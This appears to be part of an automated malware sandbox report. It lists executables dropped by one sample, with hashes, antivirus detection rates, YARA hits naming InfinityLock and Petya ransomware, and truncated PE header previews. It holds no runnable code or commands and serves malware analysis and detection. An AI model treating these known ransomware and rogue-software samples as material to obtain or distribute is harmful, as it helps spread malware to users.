                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                • Antivirus: Metadefender, Detection: 36%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,7.M.................H...V.......f... ........@.. ....................... ............@..................................f..K.......@P........................................................................... ............... ..H............text....F... ...H.................. ..`.sdata...............L..............@....rsrc...@P.......R...N..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):216064
                                                                                                                                                Entropy (8bit):3.1340875869032985
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:YoCFfC303p22fkZrRQpnqjoi7l832fbu9ZXILwVENbM:rCVC303p22sZrRQpnviB832Du9WMON
                                                                                                                                                MD5:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                SHA1:7711CB4873E58B7ADCF2A2B047B090E78D10C75B
                                                                                                                                                SHA-256:F5D002BFE80B48386A6C99C41528931B7F5DF736CD34094463C3F85DDE0180BF
                                                                                                                                                SHA-512:62A2C329B43D186C4C602C5F63EFC8D2657AA956F21184334263E4F6D0204D7C31F86BDA6E85E65E3B99B891C1630D805B70997731C174F6081ECC367CCF9416
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...sWAY.....................d......^.... ... ....@.. ....................................`.....................................W....@..._........................... ............................................... ............... ..H............text...d.... ...................... ..`.sdata..8.... ......................@....rsrc...._...@...`..................@..@.reloc...............J..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6438912
                                                                                                                                                Entropy (8bit):6.6234173300696355
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:hvOOFJ+Z8eAgy7SH9s76RSvyqJOBgECfMfYv+85JH0DVczt8A:hvOOFJ+ggr9s76R+wcMAv+IHCczt8
                                                                                                                                                MD5:04155ED507699B4E37532E8371192C0B
                                                                                                                                                SHA1:A14107131237DBB0DF750E74281C462A2EA61016
                                                                                                                                                SHA-256:B6371644B93B9D3B9B32B2F13F8265F9C23DDECC1E9C5A0291BBF98AA0FC3B77
                                                                                                                                                SHA-512:6DE59EBBC9B96C8A19D530CAA13AA8129531EBD14B3B6C6BBB758426B59ED5AB12483BFA232D853AF2E661021231B4B3FCC6C53E187EEBA38FA523F673115371
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................^&...;.....tp&.......&..............................@b..................@............................'..N...0*...8...................'.T8............................'.....................D.'..............................text....8&......8&................. ..`.itext..."...P&.."...P&............. ..`.data........&......&.............@....bss.....`....'..`....'..................idata...N....'..N....'.............@....tls....L.....'.L.....'..................rdata........'.......'.............@..@.reloc..T8....'.T8....'.............@..B.rsrc.....8..0*...8..0*.............@..@.............0a......v`.............@..@................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):54569
                                                                                                                                                Entropy (8bit):6.640114556707396
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:4yKoNLsn4Jp9ZvRInygrpMoZN+WtOl08jxBEHCDwBLpZTPCUvQK:j/sn4/OycxZN+MKxp8t9zQK
                                                                                                                                                MD5:87CCD6F4EC0E6B706D65550F90B0E3C7
                                                                                                                                                SHA1:213E6624BFF6064C016B9CDC15D5365823C01F5F
                                                                                                                                                SHA-256:E79F164CCC75A5D5C032B4C5A96D6AD7604FAFFB28AFE77BC29B9173FA3543E4
                                                                                                                                                SHA-512:A72403D462E2E2E181DBDABFCC02889F001387943571391BEFED491AAECBA830B0869BDD4D82BCA137BD4061BBBFB692871B1B4622C4A7D9F16792C60999C990
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.{.#q..#q..#q..@S?.!q...n...q...UU."q...UP."q..Rich#q..........................PE..L...X\q@.................L...........7.......`....@..................................:......................................db..........pG...........................................................................`..d............................text...(K.......L.................. ..`.rdata..|....`.......P..............@..@.data....3...p.......`..............@....rsrc...pG.......H...n..............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1182593
                                                                                                                                                Entropy (8bit):7.772772849171323
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:pXhZgPlmWcA4Te9+g6+lET/+xRXKRwFSmjTGIWrwg:xInpSe99pCkRXKRMdGIWrN
                                                                                                                                                MD5:2EB3CE80B26345BD139F7378330B19C1
                                                                                                                                                SHA1:10122BD8DD749E20C132D108D176794F140242B0
                                                                                                                                                SHA-256:8ABED3EA04D52C42BDD6C9169C59212A7D8C649C12006B8278EDA5AA91154CD2
                                                                                                                                                SHA-512:E3223CD07D59CD97893304A3632B3A66FD91635848160C33011C103CCA2BADBFE9B78FE258666B634E455872F3A98889EDE5A425D8FAE91CAE6983DA1EA1190A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~............b......b..<....b.....)^......................................... ...... ......%...... ......Rich............PE..L...~.r\.....................>......y.............@..........................p............@............................4.......<.......$s...................P.......n..T...........................(...@...............\...T... ....................text...d........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...$s.......t..................@..@.reloc.......P... ..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):424448
                                                                                                                                                Entropy (8bit):7.802970757279057
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:BCoFAtv2DDWANPG4F0vwDsl6JEFiGUHzAB4lTa7tKzWNYRbvhLWxsqgyn:koOv2D60PLyvaJTT9Za7kziYD69g
                                                                                                                                                MD5:D0DEB2644C9435EA701E88537787EA6E
                                                                                                                                                SHA1:866E47ECD80DA89C4F56557659027A3AEE897132
                                                                                                                                                SHA-256:AD6CD46F373AADAD85FAB5ECDB4CB4AD7EBD0CBE44C84DB5D2A2EE1B54EB5EC3
                                                                                                                                                SHA-512:6FAAC2E1003290BB3A0613EE84D5C76D3C48A4524E97975E9174D6FCFB5A6A48D6648B06ED5A4C10C3349F70EFFFC6A08A185FDEB0824250AE044B96EF39FCDF
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                • Antivirus: Metadefender, Detection: 80%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=.R=.R=.R...R6.R=.R+.R..R<.R...R<.R..R<.RRich=.R........PE..L.....7O...................._....................................................................@..........................l...x.......................................................................................l............................text...h........................... ..`.rdata..............................@..@.data...<...........................@....tls................................@....rsrc...............................@..@.sdata...............p..............@....wdata...............r..............@....rdata...............t..............@....fdata...............v..............@....mdata...............x..............@...........................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10148025
                                                                                                                                                Entropy (8bit):7.9801835318970475
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:CtbTP1ErBwMQjd1YTHdmpCP2PVgP/acIE/xQ0zyZejVk+YzbRdTZ:C1E1+dYx6OP9hdyZwV4zd
                                                                                                                                                MD5:1F13396FA59D38EBE76CCC587CCB11BB
                                                                                                                                                SHA1:867ADB3076C0D335B9BFA64594EF37A7E2C951FF
                                                                                                                                                SHA-256:83ECB875F87150A88F4C3D496EB3CB5388CD8BAFDFF4879884ECECDBD1896E1D
                                                                                                                                                SHA-512:82CA2C781BDAA6980F365D1EEDB0AF5AC5A80842F6EDC28A23A5B9EA7B6FEEC5CD37D54BD08D9281C9CA534ED0047E1E234873B06C7D2B6FE23A7B88A4394FDC
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................F..........hT.......`....@.................................1............@..................................................................................................................................................CODE.....D.......F.................. ..`DATA.....(...`...*...J..............@...BSS..................t...................idata...............t..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P............. ......................@..P........................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1427968
                                                                                                                                                Entropy (8bit):6.856188310924527
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
                                                                                                                                                MD5:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                                                                SHA1:57EDD72391D710D71BEAD504D44389D0462CCEC9
                                                                                                                                                SHA-256:2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
                                                                                                                                                SHA-512:87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..=...n...n...n5g.n...n...n...n..6n...n...n...n..!n...n..$n...nRich...n................PE..L...c@)Y.................P...v...... ........`....@..................................................................................`...............................................................................`...............................text....N.......P.................. ..`.rdata..|....`.......T..............@..@.data........P.......6..............@....rsrc....|...`.......<..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):899582
                                                                                                                                                Entropy (8bit):7.955977131352216
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:bUWqistOB98g0Z1hPLX2jOmsQl3eW0a92Vdcvd7wR:bUUZ98g0FPLIRl3sa92Hcvd8R
                                                                                                                                                MD5:E4D4A59494265949993E26DEE7B077D1
                                                                                                                                                SHA1:83E3D0C7E544117D6054E7D55932A7D2DBAF1163
                                                                                                                                                SHA-256:5AE57D8750822C203F5BF5E241C7132377B250DF36A215DFF2F396C8440B82DD
                                                                                                                                                SHA-512:EFD176555415E0771A22A6CA6F15A82AEC14CA090D2599959612DB9D8E07065E38A7B82E2BF7BE67CBE1494733344879782F5516BB502E0177E7B540C96FA718
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                • Antivirus: Metadefender, Detection: 28%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9.o.9.o.9.o..a..1.o..a..*.o.9.n...o.'...<.o.0..8.o.0....o.0...8.o.'...8.o.0...8.o.Rich9.o.........PE..L.....J.....................X.............. ....@..........................P......7...............................P7..3....(...........:..........................."............................................... ...............................text...|........................... ..`.rdata....... ......................@..@.data........@.......$..............@....CRT.................&..............@..@.rsrc....:.......<...(..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Create Time/Date: Mon Jun 21 08:00:00 1999, Name of Creating Application: Windows Installer, Security: 1, Code page: 1252, Template: Intel;1033, Number of Pages: 200, Revision Number: {E3A8E397-19CD-45D5-9611-44A2EB0D7861}, Title: PC Defender, Author: Def Group, Number of Words: 2, Last Saved Time/Date: Mon Sep 6 19:10:34 2010, Last Printed: Mon Sep 6 19:10:34 2010
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):881152
                                                                                                                                                Entropy (8bit):7.905751034096731
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:TkRBL2LYcyvue73Ze+RrM31N0vhMN0T4+ZI:TkRBLgiue73Ze+SWI+Z
                                                                                                                                                MD5:B3DCE5C3F95A18FD076FAD0F73BB9E39
                                                                                                                                                SHA1:E80CC285A77302EE221F47E4E94823D4B2EBA368
                                                                                                                                                SHA-256:DF2E3B2222DCDBB5E0DBDD1200EC8FD5F67FCBEA99E0023DF54307EAB60030FF
                                                                                                                                                SHA-512:C184436055CF74884AD0D2BD5CA00BCD5A62D6BE46253FE8C71B4DAAA5C710B9DF34AF1B6E41F6D1AF94BCDEC0D33679A6A1B34BF9755678B4E177F368C11D4C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:......................>...................................8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................Z................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...^...b...:...;...<...=...>...?...@...A...B...C...D...Y...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X.......`...[...\...]...s..._...t...a...c...{...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...x...v...u...w...~...y...|...z...
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):230912
                                                                                                                                                Entropy (8bit):6.8803725877131
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:DCyjXhd1mialK+qoNr8PxtZE6x5v+k6f:rjXhd8ZlKOrMZE6x5b6f
                                                                                                                                                MD5:AF2379CC4D607A45AC44D62135FB7015
                                                                                                                                                SHA1:39B6D40906C7F7F080E6BEFA93324DDDADCBD9FA
                                                                                                                                                SHA-256:26B4699A7B9EEB16E76305D843D4AB05E94D43F3201436927E13B3EBAFA90739
                                                                                                                                                SHA-512:69899C47D0B15F92980F79517384E83373242E045CA696C6E8F930FF6454219BF609E0D84C2F91D25DFD5EF3C28C9E099C4A3A918206E957BE806A1C2E0D3E99
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: Petya_Ransomware, Description: Detects Petya Ransomware, Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, Author: Florian Roth
                                                                                                                                                • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, Author: CCN-CERT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                • Antivirus: Metadefender, Detection: 84%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..}\..}\..}Q..}...}Q.!}B..}Q..}...}...}^..}..0}X..}..5}}..}\..}...}y..}9..}Q.%}]..}y. }]..}Rich\..}................PE..L......V.................p...B......oq............@.................................E\.......................................*...................................#......8...............................@............................................text...5o.......p.................. ..`.rdata...............t..............@..@.data...@I...P.......6..............@....rsrc................P..............@..@.reloc...#.......$...b..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):225280
                                                                                                                                                Entropy (8bit):7.663735783294972
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:EJv/3Ppzq+M4Lh5VWK5qlYRV+hvuFiweXXbGgL90v5mq33Z3:8hzEA5GlYMWFBeXvx0c+3
                                                                                                                                                MD5:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                                                                SHA1:9CAA5C658B1A88FEE149893D3A00B34A8BB8A1A6
                                                                                                                                                SHA-256:1898F2CAE1E3824CB0F7FD5368171A33ABA179E63501E480B4DA9EA05EBF0423
                                                                                                                                                SHA-512:DC3D6E409CEE4D54F48D1A25912243D07E2F800578C8E0E348CE515A047ECF5FA3089B46284E0956BBCED345957A000EECDC082E6F3060971759D70A14C1C97E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                • Antivirus: Metadefender, Detection: 82%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{....................\...........(.......p....@..................................................................................p..\............................................................................................................text...I[.......\.................. ....rsrc...\....p.......^.............. .............4)...t....I.....px.:.0.57. Jr~L..3.;..FkJ......F.W.`.;..$g..... u.l......7...)..SO.=...*.).!vZmX4....Er...H0....*..........,./$.....@..}D........b.q...k.w...h.P..E..(R.....m..2)+b.......{.\.0......}".?.....6.HJK}..s..K.=L...I.C....#.W....aY...o......bvr.myH%.5.@.{..>...&.h6.#=.[.......N....kD..(....?.t.'z..s..*.p...._YA...T...dI..Ry....H=?..Y.=..+........[.d$..C?eE.....N.(.'.V(....l....9IJ....5.$B..].O.3..AJ.B.5...{]...` T. >......3.L.\...5s.......
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1096816
                                                                                                                                                Entropy (8bit):7.983532463541044
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:32eLSKYFDvuca/8b/gvKyLNWg8daBqqxAWvEZon2USxZr:32yQF7uz/IyL8gJqKvUc2UM9
                                                                                                                                                MD5:0002DDDBA512E20C3F82AAAB8BAD8B4D
                                                                                                                                                SHA1:493286B108822BA636CC0E53B8259E4F06ECF900
                                                                                                                                                SHA-256:2D68FE191BA9E97F57F07F7BD116E53800B983D267DA99BF0A6E6624DD7E5CF7
                                                                                                                                                SHA-512:497954400AB463EB254ABE895648C208A1CC951ECB231202362DADBE3FFB49D8D853B487589CE935C1DC8171F56D0DF95093FFC655C684FAA944C13BCFD87B8B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................D....................@..........................P...................@..............................P.......$2..........................................................................................................CODE....@........................... ..`DATA....H...........................@...BSS.....4................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...$2.......4..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2520576
                                                                                                                                                Entropy (8bit):7.746940560683332
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:CEwbO4PqokXfEP5lJSHlxfGe9pkDda1ei/o+HapablRA9h9nNf3cfxRt5Q469DTd:amokPClGZ9MWwL73KzTaTn6nX2gEeFvE
                                                                                                                                                MD5:02F471D1FEFBDC07AF5555DBFD6EA918
                                                                                                                                                SHA1:2A8F93DD21628933DE8BEA4A9ABC00DBB215DF0B
                                                                                                                                                SHA-256:36619636D511FD4B77D3C1052067F5F2A514F7F31DFAA6B2E5677FBB61FD8CBA
                                                                                                                                                SHA-512:287B57B5D318764B2E92EC387099E7E313BA404B73DB64D21102BA8656636ABBF52BB345328FE58084DC70414C9E2D8CD46ABD5A463C6D771D9C3BA68759A559
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5..Q5..Q5..Q<.-Q4..Q<.;Q4..Q5..Q}..Q...Q<..Q<.2Q1..Q<.*Q4..Q+.,Q4..Q<.)Q4..QRich5..Q........PE..L....#,G.................$...r&...h...i...i..0i...@...................................'..........@...................;i......1i......pi.T&&...i. ...........................................P@i......................0i..............................code.....h..............................text....*....i..,..................@....rdata.......0i......0..............@....tls.........Pi......H..............@....CRT.........`i......J..............@..@.rsrc...T&&..pi..(&..L..............@..@.reloc...............t&.............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):926208
                                                                                                                                                Entropy (8bit):7.962685597000549
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:bnQv6Dyxn2Qx0KHizHWKxHuyCcZFyXR1tG:2OE2QtCzhh/7R
                                                                                                                                                MD5:0315C3149C7DC1D865DC5A89043D870D
                                                                                                                                                SHA1:F74546DDA99891CA688416B1A61C9637B3794108
                                                                                                                                                SHA-256:90C2C3944FA8933EEFC699CF590ED836086DEB31EE56EC71B5651FD978A352C9
                                                                                                                                                SHA-512:7168DC244F0E400FA302801078E3FAEC8CDD2D3CB3B8BAAAB0A1B3C0929D7CF41E54BFBE530AD5CE96A6B63761F7866D26AAAE788C3138C34294174091478112
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.s.y...y...y.......x.....G.x...Richy...........................PE..L...A..K.................L...................`....@.............M.-..........P...............................................X..P....p..0...................................................................0...X.......p............................text...$J.......L.................. ..`.data...@....`......................@....rsrc........p.......P..............@..@..H(...Y..H3......I@......IM...........user32.dll.MSVBVM60.DLL.kernel32.dll.NTDLL.DLL..................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1505280
                                                                                                                                                Entropy (8bit):7.951929263490591
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:yYzpj9/AteBV+n/yETaXh8Nv9Xx5/ttAoRfwAy+/CxCWfxBcMkC9e327kY:djRAK+6Fh8zPvrRISCxt5q3SA
                                                                                                                                                MD5:E1B69C058131E1593ECCD4FBCDBB72B2
                                                                                                                                                SHA1:6D319439CAC072547EDD7CF2019855FA25092006
                                                                                                                                                SHA-256:B61C53F4137C41AA0A5538FC9A746034B3A903CC4B1B3C8B5F3D3118E1E2BD8F
                                                                                                                                                SHA-512:161A5923DC3A6507CBEE3B547EDCEF4FBFE1DC6A04832C2472B1E635D758D1503A61361C2A83A13A0D8E4607516FDA4AE6462A74DF66B20A7C93174BBCC7129C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5b..5b..5b......5b..5c..5b..M.5b..M.5b.Rich.5b.................PE..L...P.IM.....................................0....@..........................@............@..................................0..(................................5...................................................0...............................text............................... ..`.rdata..p....0....... ..............@..@.data........@......."..............@....rsrc...............................@..@.reloc...F.......H..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1257984
                                                                                                                                                Entropy (8bit):6.67278609716153
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:QH1eYXlVeneL/AuCeGhqzjheKTnHdQSR9wlPlVlbzl+lwlElPS3PomNX:QVZVeneLYcmiN7Q6Md3dMyuI
                                                                                                                                                MD5:D5E5853F5A2A5A7413F26C625C0E240B
                                                                                                                                                SHA1:0CED68483E7F3742A963F2507937BB7089DE3FFE
                                                                                                                                                SHA-256:415DD13C421A27ED96BF81579B112FBAC05862405E9964E24EC8E9D4611D25F3
                                                                                                                                                SHA-512:49EA9AB92CE5832E702FAC6F56A7F7168F60D8271419460ED27970C4A0400E996C2EA097636FC145E355C4DF5CFBF200B7BF3C691133F72E4CAD228F570B91E4
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0O{>t..mt..mt..my|.mU..m2..ms..my|.m...my|.m...m}V.m}..m}V.ma..mt..m...m.W.mi..my|.mu..mt..mu..m.W.mu..mRicht..m................PE..L...$_.U.................~..........ju............@.......................................@.............................................X...........................................................Pd..@............................................text....}.......~.................. ..`.rdata...d.......f..................@..@.data...l........L..................@....rsrc...X............4..............@..@.reloc...K...`...L..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2330112
                                                                                                                                                Entropy (8bit):7.9751665313341285
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:agXTaxuzs1L1ivBzV+3ZYqjuPOBW0wtuVXgPcOU7m6X+d:aeTaxuo1LYvT+3SiiO8LcZOU7XU
                                                                                                                                                MD5:7DDE6427DCF06D0C861693B96AD053A0
                                                                                                                                                SHA1:086008ECFE06AD06F4C0EEE2B13530897146AE01
                                                                                                                                                SHA-256:077C04EE44667C5E1024652A7BBE7FFF81360EF128245FFD4CD843B7A56227CF
                                                                                                                                                SHA-512:8CF162F83EBFA2F3DB54B10D5B0E6AF590E97596AC2D469058A98340BF27DE2866E679C777AA46DD530DB44C27503D4CEA8C34D96CB83B71477A806B5AB7C1B9
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
